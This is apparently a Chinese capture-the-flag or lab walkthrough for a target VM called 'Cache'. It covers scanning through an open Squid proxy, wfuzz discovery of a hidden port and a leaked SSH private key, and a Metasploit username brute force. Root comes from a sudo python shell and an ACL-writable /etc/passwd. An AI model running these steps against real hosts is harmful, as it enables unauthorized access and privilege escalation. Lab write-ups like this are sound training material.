# 靶场搭建
下载:Cache
Nat,IP: 192.168.1.152
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) | |
| ssh-hostkey: | |
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA) | |
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519) | |
80/tcp open http Apache httpd 2.4.57 ((Debian)) | |
|_http-title: Apache2 Debian Default Page: It works | |
|_http-server-header: Apache/2.4.57 (Debian) | |
3128/tcp open http-proxy Squid http proxy 5.7 | |
|_http-open-proxy: Proxy might be redirecting requests | |
|_http-server-header: squid/5.7 | |
|_http-title: ERROR: The requested URL could not be retrieved |
3128 是代理,应该是要走代理访问 80 端口
用 proxychains 不知道为什么不行
走代理扫一下端口
┌──(root㉿kali)-[~] | |
└─# wfuzz -c --hc=400,403,503 -t 200 -z range,1-65535 -p 192.168.1.152:3128:HTTP http://127.0.0.1:FUZZ | |
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. | |
******************************************************** | |
* Wfuzz 3.1.0 - The Web Fuzzer * | |
******************************************************** | |
Target: http://127.0.0.1:FUZZ/ | |
Total requests: 65535 | |
===================================================================== | |
ID Response Lines Word Chars Payload | |
===================================================================== | |
000000080: 200 368 L 933 W 10701 Ch "80" | |
000021500: 200 22 L 40 W 325 Ch "21500" | |
Total time: 90.54842 | |
Processed Requests: 65535 | |
Filtered Requests: 65533 | |
Requests/sec.: 723.7563 |
加代理扫一下再
┌──(root㉿kali)-[~] | |
└─# wfuzz -c --hc=404 --hl=22 -t 200 -w /usr/share/seclists/Discovery/Web-Content/big.txt -p 192.168.1.152:3128:HTTP http://127.0.0.1:21500/FUZZ | |
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. | |
******************************************************** | |
* Wfuzz 3.1.0 - The Web Fuzzer * | |
******************************************************** | |
Target: http://127.0.0.1:21500/FUZZ | |
Total requests: 20476 | |
===================================================================== | |
ID Response Lines Word Chars Payload | |
===================================================================== | |
000004732: 301 7 L 11 W 169 Ch "cloud" | |
Total time: 0 | |
Processed Requests: 20476 | |
Filtered Requests: 20475 | |
Requests/sec.: 0 |
再扫
┌──(root㉿kali)-[~] | |
└─# wfuzz -c -p 192.168.1.152:3128 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u "http://127.0.0.1:21500/cloud/FUZZ" --hc=404,403 | |
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. | |
******************************************************** | |
* Wfuzz 3.1.0 - The Web Fuzzer * | |
******************************************************** | |
Target: http://127.0.0.1:21500/cloud/FUZZ | |
Total requests: 207643 | |
===================================================================== | |
ID Response Lines Word Chars Payload | |
===================================================================== | |
000001690: 200 27 L 33 W 1675 Ch "key" |
拿到 key: curl --proxy http://192.168.1.152:3128 http://127.0.0.1:21500/cloud/key > id_rsa
启动 msf 爆破一下用户名
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > show options | |
Module options (auxiliary/scanner/ssh/ssh_login_pubkey): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and | |
password | |
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 | |
CreateSession true no Create a new session for every successful l | |
ogin | |
DB_ALL_USERS false no Add all users in the current database to th | |
e list | |
KEY_PASS no Passphrase for SSH private key(s) | |
KEY_PATH /root/id_rsa no Filename or directory of cleartext private | |
keys. Filenames beginning with a dot, or en | |
ding in ".pub" will be skipped. Duplicate p | |
rivate keys will be ignored. | |
PRIVATE_KEY no The string value of the private key that wi | |
ll be used. If you are using MSFConsole, th | |
is value should be set as file:PRIVATE_KEY_ | |
PATH. OpenSSH, RSA, DSA, and ECDSA private | |
keys are supported. | |
RHOSTS 192.168.1.152 yes The target host(s), see https://docs.metasp | |
loit.com/docs/using-metasploit/basics/using | |
-metasploit.html | |
RPORT 22 yes The target port | |
STOP_ON_SUCCESS true yes Stop guessing when a credential works for a | |
host | |
THREADS 20 yes The number of concurrent threads (max one p | |
er host) | |
USERNAME no A specific username to authenticate as | |
USER_FILE /usr/share/wordlists/secl no File containing usernames, one per line | |
ists/Usernames/Names/name | |
s.txt | |
VERBOSE true yes Whether to print output for all attempts | |
View the full module info with the info, or info -d command. |
run 一下就拿到 session 了,用户名: abraham
拿到了 shell
# 提权
sudo -l ,直接用 python 提权: sudo -u jeff python -c 'import pty; pty.spawn("/bin/bash")' 拿到了 jeff 的 shell
ACL 发现 passwd 可写: find / -exec sh -c 'getfacl {} 2>/dev/null | grep -q "user:jeff" && echo {}' \; 2>/dev/null
openssl passwd '123456' 生成哈希值
写入到 passwd 的 root 中,直接用密码 su 过去就拿到了 root 权限
